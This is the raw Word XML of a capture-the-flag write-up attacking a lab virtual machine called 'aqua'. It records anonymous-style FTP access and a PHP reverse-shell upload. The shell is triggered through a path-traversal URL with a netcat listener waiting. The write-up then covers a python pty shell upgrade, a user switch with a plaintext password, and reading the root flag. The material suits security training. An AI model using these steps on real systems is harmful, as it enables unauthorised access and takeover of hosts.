    <w:p w:rsidR="6683AE2F" w:rsidP="51CB6664" w:rsidRDefault="6683AE2F" w14:paraId="7DDE2C1F" w14:textId="56F785AA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139/tcp open  netbios-ssn</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6683AE2F" w:rsidP="51CB6664" w:rsidRDefault="6683AE2F" w14:paraId="2BEC2A31" w14:textId="57CF58D7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445/tcp open  microsoft-ds</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6683AE2F" w:rsidP="51CB6664" w:rsidRDefault="6683AE2F" w14:paraId="3425DBC3" w14:textId="273CA973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MAC Address: 08:00:27:BD:32:FA (Oracle VirtualBox virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="51CB6664" w:rsidP="51CB6664" w:rsidRDefault="51CB6664" w14:paraId="326CBCEF" w14:textId="54A33B1B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1BC0BDC3" w14:textId="53CE9DE3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3E3312F2" w14:textId="17CBBCB8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6683AE2F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>ESTABLISHING FTP CONNECTION THROUGH p21</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="51CB6664" w:rsidP="51CB6664" w:rsidRDefault="51CB6664" w14:paraId="766A12C7" w14:textId="780D70FE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4BBFB568" w:rsidP="51CB6664" w:rsidRDefault="4BBFB568" w14:paraId="60AE2769" w14:textId="57E440BE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┌──(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root㉿kali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)-[/home/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altamash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]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4BBFB568" w:rsidP="51CB6664" w:rsidRDefault="4BBFB568" w14:paraId="2CD7B9BF" w14:textId="3C0B25F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└─# ftp 192.168.243.24</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4BBFB568" w:rsidP="51CB6664" w:rsidRDefault="4BBFB568" w14:paraId="668C81AC" w14:textId="2DC26D8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Connected to 192.168.243.24.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4BBFB568" w:rsidP="51CB6664" w:rsidRDefault="4BBFB568" w14:paraId="48AB3CAD" w14:textId="3C1EF0E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220 (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vsFTPd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3.0.3)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4BBFB568" w:rsidP="51CB6664" w:rsidRDefault="4BBFB568" w14:paraId="7EA95211" w14:textId="7AAE8F5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Name (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192.168.243.24:altamash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): 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megumin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4BBFB568" w:rsidP="51CB6664" w:rsidRDefault="4BBFB568" w14:paraId="59FF7867" w14:textId="4151A92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331 Please specify the password.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4BBFB568" w:rsidP="51CB6664" w:rsidRDefault="4BBFB568" w14:paraId="1A1CEC49" w14:textId="691B7B4B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Password: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4BBFB568" w:rsidP="51CB6664" w:rsidRDefault="4BBFB568" w14:paraId="541DB826" w14:textId="700112D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230 Login successful.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4BBFB568" w:rsidP="51CB6664" w:rsidRDefault="4BBFB568" w14:paraId="64EF29D4" w14:textId="60AFBF7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Remote</w:t>
      </w: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system type is UNIX.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4BBFB568" w:rsidP="51CB6664" w:rsidRDefault="4BBFB568" w14:paraId="2C0E29AA" w14:textId="4B9FEBF2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Using binary mode to transfer files.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4BBFB568" w:rsidP="51CB6664" w:rsidRDefault="4BBFB568" w14:paraId="6D578B1C" w14:textId="1A3AA00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ls</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4BBFB568" w:rsidP="51CB6664" w:rsidRDefault="4BBFB568" w14:paraId="5541E39D" w14:textId="3501207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get notes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4BBFB568" w:rsidP="51CB6664" w:rsidRDefault="4BBFB568" w14:paraId="559A2094" w14:textId="4EE74B2C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local: notes remote: notes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4BBFB568" w:rsidP="51CB6664" w:rsidRDefault="4BBFB568" w14:paraId="5EEF5303" w14:textId="4A5F26D5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229 Entering Extended Passive Mode (|||50840|)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4BBFB568" w:rsidP="51CB6664" w:rsidRDefault="4BBFB568" w14:paraId="643F6004" w14:textId="61128521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150 Opening BINARY mode data connection for notes (93 bytes).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4BBFB568" w:rsidP="51CB6664" w:rsidRDefault="4BBFB568" w14:paraId="27184CEA" w14:textId="629580FF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100% |*************************************************************************************************************************************************************************************************|    93        1.28 MiB/s    00:00 ETA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4BBFB568" w:rsidP="51CB6664" w:rsidRDefault="4BBFB568" w14:paraId="75D2CE00" w14:textId="0A796514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226 Transfer complete.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4BBFB568" w:rsidP="51CB6664" w:rsidRDefault="4BBFB568" w14:paraId="4D761717" w14:textId="6F3A2BF0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93 bytes received in 00:00 (248.82 KiB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4BBFB568" w:rsidP="51CB6664" w:rsidRDefault="4BBFB568" w14:paraId="2784EEBB" w14:textId="7762089D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get hello.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4BBFB568" w:rsidP="51CB6664" w:rsidRDefault="4BBFB568" w14:paraId="1494F9B3" w14:textId="71FCE650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local: hello.php remote: hello.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4BBFB568" w:rsidP="51CB6664" w:rsidRDefault="4BBFB568" w14:paraId="66271856" w14:textId="7E7802D2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229 Entering Extended Passive Mode (|||39506|)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4BBFB568" w:rsidP="51CB6664" w:rsidRDefault="4BBFB568" w14:paraId="55FD112E" w14:textId="59048EBF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150 Opening BINARY mode data connection for hello.php (107 bytes).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4BBFB568" w:rsidP="51CB6664" w:rsidRDefault="4BBFB568" w14:paraId="34810E96" w14:textId="6ECE2FD3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100% |***********************|   107        1.18 MiB/s    00:00 ETA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4BBFB568" w:rsidP="51CB6664" w:rsidRDefault="4BBFB568" w14:paraId="6D224CF9" w14:textId="17E74CBA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226 Transfer complete.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4BBFB568" w:rsidP="51CB6664" w:rsidRDefault="4BBFB568" w14:paraId="7BD2F24F" w14:textId="22D05C9D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107 bytes received in 00:00 (267.92 KiB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4BBFB568" w:rsidP="51CB6664" w:rsidRDefault="4BBFB568" w14:paraId="2B8BC0FC" w14:textId="654C8F72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cd production</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4BBFB568" w:rsidP="51CB6664" w:rsidRDefault="4BBFB568" w14:paraId="605F8EE7" w14:textId="18FE97B8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250 Directory successfully changed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4BBFB568" w:rsidP="51CB6664" w:rsidRDefault="4BBFB568" w14:paraId="69D00289" w14:textId="321C01B9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put reverse_shelll.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4BBFB568" w:rsidP="51CB6664" w:rsidRDefault="4BBFB568" w14:paraId="32BFC76F" w14:textId="03B5B6EC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local: reverse_shelll.php remote: reverse_shelll.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4BBFB568" w:rsidP="51CB6664" w:rsidRDefault="4BBFB568" w14:paraId="19B81B1E" w14:textId="5FF3F051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229 Entering Extended Passive Mode (|||49830|)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4BBFB568" w:rsidP="51CB6664" w:rsidRDefault="4BBFB568" w14:paraId="0252B654" w14:textId="3AB1AA1D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150 Ok to send data.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4BBFB568" w:rsidP="51CB6664" w:rsidRDefault="4BBFB568" w14:paraId="43443C51" w14:textId="76D13329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100% |*************************************************************************************************************************************************************************************************|  5494      116.43 MiB/s    00:00 ETA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4BBFB568" w:rsidP="51CB6664" w:rsidRDefault="4BBFB568" w14:paraId="7882F62F" w14:textId="25515058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226 Transfer complete.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4BBFB568" w:rsidP="51CB6664" w:rsidRDefault="4BBFB568" w14:paraId="2F4EC12F" w14:textId="6BE90060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5494 bytes sent in 00:00 (12.71 MiB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4BBFB568" w:rsidP="51CB6664" w:rsidRDefault="4BBFB568" w14:paraId="304784BB" w14:textId="7AE54804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ftp&gt; ls</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4BBFB568" w:rsidP="51CB6664" w:rsidRDefault="4BBFB568" w14:paraId="004585D2" w14:textId="055D66B4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229 Entering Extended Passive Mode (|||48105|)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4BBFB568" w:rsidP="51CB6664" w:rsidRDefault="4BBFB568" w14:paraId="1AAF21CC" w14:textId="06ED7611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150 Here comes the directory listing.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4BBFB568" w:rsidP="51CB6664" w:rsidRDefault="4BBFB568" w14:paraId="4F7B434D" w14:textId="618DD52B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-rw-rw-r--    1 1001     1001           52 Jan 14  2020 meow.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4BBFB568" w:rsidP="51CB6664" w:rsidRDefault="4BBFB568" w14:paraId="13F5B704" w14:textId="55A02EC4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-rw-rw-r--    1 1001     1001         5494 Jun 01 09:05 reverse_shelll.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4BBFB568" w:rsidP="51CB6664" w:rsidRDefault="4BBFB568" w14:paraId="01C17BF2" w14:textId="5448A76F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226 Directory send OK.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4BBFB568" w:rsidP="51CB6664" w:rsidRDefault="4BBFB568" w14:paraId="1088C260" w14:textId="0B766C90">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r w:rsidRPr="51CB6664" w:rsidR="4BBFB56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ftp&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="51CB6664" w:rsidP="51CB6664" w:rsidRDefault="51CB6664" w14:paraId="0C513EE2" w14:textId="74B9BA6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1D67407E" w14:textId="50762413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084ED68F" w14:textId="42ABC42C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lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="70FB34EA" w:rsidP="51CB6664" w:rsidRDefault="70FB34EA" w14:paraId="2C61F014" w14:textId="020B9542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lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="51CB6664" w:rsidR="70FB34EA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lang w:val="en-US"/>
        </w:rPr>
        <w:t>Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="70FB34EA" w:rsidP="51CB6664" w:rsidRDefault="70FB34EA" w14:paraId="392309DE" w14:textId="17A1600B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70FB34EA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lang w:val="en-US"/>
        </w:rPr>
        <w:t>Deploying and executing payloa</w:t>
      </w:r>
      <w:r w:rsidRPr="51CB6664" w:rsidR="70FB34EA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>d</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="51CB6664" w:rsidP="51CB6664" w:rsidRDefault="51CB6664" w14:paraId="685CAF0D" w14:textId="4A4A55D4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70FB34EA" w:rsidP="51CB6664" w:rsidRDefault="70FB34EA" w14:paraId="69384E92" w14:textId="103EA933">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr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┌──(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altamash㉿kali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)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-[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~]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="70FB34EA" w:rsidP="51CB6664" w:rsidRDefault="70FB34EA" w14:paraId="26B9BC8A" w14:textId="4B515E34">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0" w:firstLine="72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└─$ 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nc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-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lnvp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4444      </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="70FB34EA" w:rsidP="51CB6664" w:rsidRDefault="70FB34EA" w14:paraId="6D6139A3" w14:textId="753C11E5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr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Starting the server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="70FB34EA" w:rsidP="51CB6664" w:rsidRDefault="70FB34EA" w14:paraId="27C1F0E2" w14:textId="618F926C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http://192.168.243.24/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welcome.php?file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=..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/deployment/production</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/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/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>reverse_shelll.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="51CB6664" w:rsidP="51CB6664" w:rsidRDefault="51CB6664" w14:paraId="78DCA189" w14:textId="46B21F86">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0" w:firstLine="72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70FB34EA" w:rsidP="51CB6664" w:rsidRDefault="70FB34EA" w14:paraId="6ACC8155" w14:textId="15C2865A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</w:pPr>
      <w:r w:rsidRPr="51CB6664" w:rsidR="70FB34EA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highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Attempting User login</w:t>
      </w:r>
      <w:r w:rsidRPr="51CB6664" w:rsidR="70FB34EA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32"/>
          <w:szCs w:val="32"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="51CB6664" w:rsidR="70FB34EA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highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>through machine command line</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="51CB6664" w:rsidP="51CB6664" w:rsidRDefault="51CB6664" w14:paraId="3548F8DF" w14:textId="1C5D1104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32"/>
          <w:szCs w:val="32"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="71026548" w:rsidP="51CB6664" w:rsidRDefault="71026548" w14:paraId="1482CCFE" w14:textId="7814BB36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┌──(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altamash㉿kali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)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-[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~]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="71026548" w:rsidP="51CB6664" w:rsidRDefault="71026548" w14:paraId="6F6F985A" w14:textId="715C285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└─$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nc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-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lnvp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4444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    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="71026548" w:rsidP="51CB6664" w:rsidRDefault="71026548" w14:paraId="065C81EB" w14:textId="034EEF8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Listening on 0.0.0.0 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="71026548" w:rsidP="51CB6664" w:rsidRDefault="71026548" w14:paraId="5CBF554D" w14:textId="59321770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Connection received on 192.168.243.24 45682</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="71026548" w:rsidP="51CB6664" w:rsidRDefault="71026548" w14:paraId="18A0C6AD" w14:textId="39AA02F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Linux aqua 4.4.0-172-generic #202-Ubuntu SMP Wed Jan 8 21:58:27 UTC 2020 i686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i686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i686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GNU/Linux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="71026548" w:rsidP="51CB6664" w:rsidRDefault="71026548" w14:paraId="3B46ED1E" w14:textId="198D822C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09:07:00 up 32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min,  0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users,  load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average: 0.03, 0.01, 0.00</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="71026548" w:rsidP="51CB6664" w:rsidRDefault="71026548" w14:paraId="121DCEDB" w14:textId="2F629E2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USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="71026548" w:rsidP="51CB6664" w:rsidRDefault="71026548" w14:paraId="35CA2B2B" w14:textId="42207236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uid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=33(www-data) gid=33(www-data) groups=33(www-data),1001(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megumin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)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="71026548" w:rsidP="51CB6664" w:rsidRDefault="71026548" w14:paraId="38E3376A" w14:textId="7722D8EB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/bin/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sh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: 0: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can't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access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tty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; job control turned off</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="71026548" w:rsidP="51CB6664" w:rsidRDefault="71026548" w14:paraId="17FFDFE4" w14:textId="222636E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$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whoami</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="71026548" w:rsidP="51CB6664" w:rsidRDefault="71026548" w14:paraId="150D8107" w14:textId="605AF6D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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="71026548" w:rsidP="51CB6664" w:rsidRDefault="71026548" w14:paraId="183CC23F" w14:textId="00C9F420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$ which python</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="71026548" w:rsidP="51CB6664" w:rsidRDefault="71026548" w14:paraId="3B3E8EBE" w14:textId="70C23CD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/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usr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/bin/python</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="71026548" w:rsidP="51CB6664" w:rsidRDefault="71026548" w14:paraId="69A70837" w14:textId="3838604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$ python -c 'import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pty;pty.spawn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("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="71026548" w:rsidP="51CB6664" w:rsidRDefault="71026548" w14:paraId="58FB930A" w14:textId="0FB392BE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www-data@aqua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:/$ export TERM=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xterm</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="71026548" w:rsidP="51CB6664" w:rsidRDefault="71026548" w14:paraId="6E325D6F" w14:textId="5C567B5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export TERM=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xterm</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="71026548" w:rsidP="51CB6664" w:rsidRDefault="71026548" w14:paraId="0991D864" w14:textId="6DFAFFD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www-data@aqua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:/$ cd /var/www/html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="71026548" w:rsidP="51CB6664" w:rsidRDefault="71026548" w14:paraId="02346BAF" w14:textId="1760C73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cd /var/www/html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="71026548" w:rsidP="51CB6664" w:rsidRDefault="71026548" w14:paraId="61040123" w14:textId="50D59B10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www-data@aqua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:/var/www/html$ /var/www$ cd html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="71026548" w:rsidP="51CB6664" w:rsidRDefault="71026548" w14:paraId="5808FADD" w14:textId="2E80C0E9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/var/www$ cd html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="71026548" w:rsidP="51CB6664" w:rsidRDefault="71026548" w14:paraId="08876986" w14:textId="65FF8D5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bash: /var/www$: No such file or directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="71026548" w:rsidP="51CB6664" w:rsidRDefault="71026548" w14:paraId="00D250C5" w14:textId="42DCF827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www-data@aqua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:/var/www/html$ ls</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="71026548" w:rsidP="51CB6664" w:rsidRDefault="71026548" w14:paraId="6E636E53" w14:textId="5A68C35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ls</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="71026548" w:rsidP="51CB6664" w:rsidRDefault="71026548" w14:paraId="5DCC95F6" w14:textId="196EED6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css</w:t>
      </w:r>
      <w:r>
        <w:tab/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 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home.php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index.php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meow</w:t>
      </w:r>
      <w:r>
        <w:tab/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welcome.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="71026548" w:rsidP="51CB6664" w:rsidRDefault="71026548" w14:paraId="14C922FF" w14:textId="26481E1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deployment  images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 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login.php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 no.html  yes.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="71026548" w:rsidP="51CB6664" w:rsidRDefault="71026548" w14:paraId="6FD9ED4D" w14:textId="71F6C8A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www-data@aqua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:/var/www/html$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su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megumin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="71026548" w:rsidP="51CB6664" w:rsidRDefault="71026548" w14:paraId="65FDC653" w14:textId="298826A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su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megumin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="71026548" w:rsidP="51CB6664" w:rsidRDefault="71026548" w14:paraId="403F3E49" w14:textId="362C29F5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Password: </w:t>
      </w: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watashiwamegumin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="71026548" w:rsidP="51CB6664" w:rsidRDefault="71026548" w14:paraId="2C93104E" w14:textId="103B39E6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 xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="71026548" w:rsidP="47676966" w:rsidRDefault="71026548" w14:paraId="0FEB018C" w14:textId="1783C3AC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4"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="47676966" w:rsidR="71026548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  <w:t>megumin@aqua</w:t>
      </w:r>
      <w:r w:rsidRPr="47676966" w:rsidR="71026548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  <w:t>:/var/www/html$</w:t>
      </w:r>
      <w:r w:rsidRPr="47676966" w:rsidR="4180AC3A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  <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="47676966" w:rsidP="47676966" w:rsidRDefault="47676966" w14:paraId="3586F65F" w14:textId="5C540003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7DEA3EB8" w:rsidP="47676966" w:rsidRDefault="7DEA3EB8" w14:paraId="394F218B" w14:textId="5F2737DC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  <w:r w:rsidRPr="47676966" w:rsidR="7DEA3EB8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  <w:t>cat root.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1AED3633" w:rsidP="47676966" w:rsidRDefault="1AED3633" w14:paraId="6C4099C1" w14:textId="5A2609B5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974"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="308B478D" w:rsidR="1AED3633">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="" w:cs=""/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="082974"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Here, we get a base64 encoded string </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="47676966" w:rsidP="47676966" w:rsidRDefault="47676966" w14:paraId="2A44B987" w14:textId="28A2BEFF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  <w:r w:rsidRPr="308B478D" w:rsidR="74211085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  <w:t>“404CDD7BC109C432F8CC2443B45BCFE95980F5107215C645236E577929AC3E52”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="308B478D" w:rsidP="308B478D" w:rsidRDefault="308B478D" w14:paraId="65139D60" w14:textId="0FBA0D3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1AED3633" w:rsidP="47676966" w:rsidRDefault="1AED3633" w14:paraId="42BB41DB" w14:textId="62666E0F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974"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="47676966" w:rsidR="1AED3633">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="" w:cs=""/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="082974"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Which once decoded gives us the flag </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="47676966" w:rsidP="47676966" w:rsidRDefault="47676966" w14:paraId="2485A3B3" w14:textId="4606567D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</w:pPr>
    </w:p>
    <w:p w:rsidR="1AED3633" w:rsidP="47676966" w:rsidRDefault="1AED3633" w14:paraId="52F5C663" w14:textId="5A15352B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</w:pP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“Do not use /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usr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/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sharH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/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gdb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 xml:space="preserve"> in the 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>sudoers</w:t>
      </w:r>
      <w:r w:rsidRPr="47676966" w:rsidR="1AED3633"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  <w:t xml:space="preserve"> file”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="47676966" w:rsidP="47676966" w:rsidRDefault="47676966" w14:paraId="0010ED74" w14:textId="58960CA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</w:pPr>
    </w:p>
    <w:p w:rsidR="308B478D" w:rsidP="308B478D" w:rsidRDefault="308B478D" w14:paraId="36E46222" w14:textId="5AF2E2D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highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="41C525FA" w:rsidP="308B478D" w:rsidRDefault="41C525FA" w14:paraId="6A219A41" w14:textId="483E0357">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r w:rsidR="41C525FA">
        <w:drawing>
          <wp:inline wp14:editId="5561A37C" wp14:anchorId="5F46F5F8">
            <wp:extent cx="6950075" cy="3909417"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2003342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95ad954d4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075" cy="3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B478D" w:rsidP="308B478D" w:rsidRDefault="308B478D" w14:paraId="52B620D1" w14:textId="55E02096">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="308B478D" w:rsidP="308B478D" w:rsidRDefault="308B478D" w14:paraId="7329E34B" w14:textId="2CE94E0F">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="308B478D" w:rsidP="308B478D" w:rsidRDefault="308B478D" w14:paraId="436D31F9" w14:textId="0BD48A0D">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="308B478D" w:rsidP="308B478D" w:rsidRDefault="308B478D" w14:paraId="423EFCB0" w14:textId="14008CA9">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="308B478D" w:rsidP="308B478D" w:rsidRDefault="308B478D" w14:paraId="6D2176D9" w14:textId="44F7880A">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="308B478D" w:rsidP="308B478D" w:rsidRDefault="308B478D" w14:paraId="41669023" w14:textId="2AED08C1">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="308B478D" w:rsidP="308B478D" w:rsidRDefault="308B478D" w14:paraId="00268BDD" w14:textId="13A57943">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="51CB6664" w:rsidP="47676966" w:rsidRDefault="51CB6664" w14:paraId="194D378C" w14:textId="186E9F9A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 w:themeColor="text2" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="47676966" w:rsidP="47676966" w:rsidRDefault="47676966" w14:paraId="7D038271" w14:textId="16086AB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47676966" w:rsidP="47676966" w:rsidRDefault="47676966" w14:paraId="00B14017" w14:textId="044D10A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47676966" w:rsidP="47676966" w:rsidRDefault="47676966" w14:paraId="4254D87A" w14:textId="689F733E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47676966" w:rsidP="47676966" w:rsidRDefault="47676966" w14:paraId="6EBCC00F" w14:textId="689E27D6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47676966" w:rsidP="47676966" w:rsidRDefault="47676966" w14:paraId="3ABA9325" w14:textId="20B06B72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974"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="71026548" w:rsidP="51CB6664" w:rsidRDefault="71026548" w14:paraId="5ABF4CD7" w14:textId="5A0A5111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Pr="51CB6664" w:rsidR="71026548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  <w:t>REFERENCE SCREENSHOTS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="51CB6664" w:rsidP="51CB6664" w:rsidRDefault="51CB6664" w14:paraId="51FBA230" w14:textId="7774CB6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</w:p>
    <w:p w:rsidR="71026548" w:rsidP="51CB6664" w:rsidRDefault="71026548" w14:paraId="6E70B3F3" w14:textId="5DF7F81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="71026548">
        <w:drawing>
          <wp:inline wp14:editId="3E2F03BD" wp14:anchorId="2A7D9CA1">
            <wp:extent cx="6798513" cy="3810000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1864755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473a9bbf444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51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B6664" w:rsidP="51CB6664" w:rsidRDefault="51CB6664" w14:paraId="124494E2" w14:textId="10FBE480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</w:p>
    <w:p w:rsidR="71026548" w:rsidP="51CB6664" w:rsidRDefault="71026548" w14:paraId="303AD668" w14:textId="48827798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4"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="71026548">
        <w:drawing>
          <wp:inline wp14:editId="7F53047B" wp14:anchorId="538FDD26">
            <wp:extent cx="6829425" cy="3827324"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2144628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a1ade05dc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8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B6664" w:rsidP="51CB6664" w:rsidRDefault="51CB6664" w14:paraId="13514752" w14:textId="7D3B1EDF">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0" w:firstLine="72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4"/>
          <w:szCs w:val="24"/>
